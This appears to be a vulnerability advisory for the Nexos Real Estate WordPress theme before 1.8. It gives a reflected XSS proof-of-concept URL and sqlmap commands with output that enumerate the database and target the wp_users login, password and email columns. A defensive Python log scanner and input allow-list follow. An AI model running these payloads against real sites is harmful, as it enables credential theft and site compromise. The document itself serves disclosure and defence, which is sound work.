wpexploit | VLΛD VΞCTOR | WPEX-ID:80E462CA-41F9-4805-BB85-449F2045CFBB
History: Jun 28, 2020 - 12:00 a.m.

Nexos - Real Estate < 1.8 - Unauthenticated Reflected XSS & SQL Injection

2020-06-28 00:00:00
VLΛD VΞCTOR

EPSS: 0.044 (percentile 92.4%)

Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme»; the tested version was v1.7. Timeline: June 17th, 2020 - confirmed and escalated to Envato. June 19th, 2020 - v1.8 released, fixing the issues.

### PoC Unauthenticated Reflected XSS:

```text
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>
```

### PoC SQL Injection:

```text
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs  --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]
```
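Both PoCs abuse the same two query parameters on the theme's `/top-map/` and `/side-map/` pages, so a site running a vulnerable version can hunt for exploitation attempts in its web server access log. The following is an added example (not the theme's code or the advisory author's), written from the defender's side: it allow-lists `search_order` (the only sound control for an ORDER BY fragment, which cannot be bound as a query parameter) and rejects markup or quote characters in `search_location`, then applies both rules to combined-format log lines. The allow-list contents beyond `idlisting DESC`, the 100-character location limit and the three sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Sort expressions the theme is assumed to emit itself ("idlisting DESC" is the
# value in the PoC URLs; the ASC variant is assumed). The value appears to reach
# ORDER BY verbatim, so anything outside this set is suspect.
ALLOWED_ORDER = {"idlisting DESC", "idlisting ASC"}
# A free-text location never needs markup or quote characters (limit assumed).
SAFE_LOCATION = re.compile(r"^[\w\s,.'-]{0,100}$")
MAP_PATH = re.compile(r"/(top|side)-map/?$")
REQUEST_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/')

def classify_request(target: str) -> list:
    """Return rule hits for one request target (path + query); [] if clean."""
    parsed = urlparse(target)
    if not MAP_PATH.search(parsed.path):
        return []
    params = parse_qs(parsed.query, keep_blank_values=True)  # %XX-decodes too
    hits = []
    for value in params.get("search_order", []):
        if value not in ALLOWED_ORDER:
            hits.append(f"search_order outside allow-list: {value!r}")
    for value in params.get("search_location", []):
        if not SAFE_LOCATION.match(value):
            hits.append(f"search_location has markup/quote chars: {value!r}")
    return hits

def scan_access_log(lines) -> list:
    """Return (client_ip, hits) for each combined-log line that trips a rule."""
    results = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if m and (hits := classify_request(m["target"])):
            results.append((m["ip"], hits))
    return results

# Constructed sample log lines (not from a real server): a benign search, the
# advisory's reflected-XSS PoC URL-encoded as a server would log it, and a
# search_order value that strays from the allow-list.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Jun/2020:02:20:01 +0000] "GET /nexos-wp/top-map/'
    '?search_order=idlisting%20DESC&search_location=Lisbon HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jun/2020:02:23:33 +0000] "GET /nexos-wp/top-map/'
    '?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src%3Dx%20'
    'onerror%3Dalert(%60XSS%60)%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jun/2020:02:23:40 +0000] "GET /nexos-wp/side-map/'
    '?search_order=idlisting%20DESC,(SELECT%201) HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags only the two requests from 203.0.113.5; the same `classify_request` check, placed in front of the theme's query builder, is the shape of the server-side fix.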
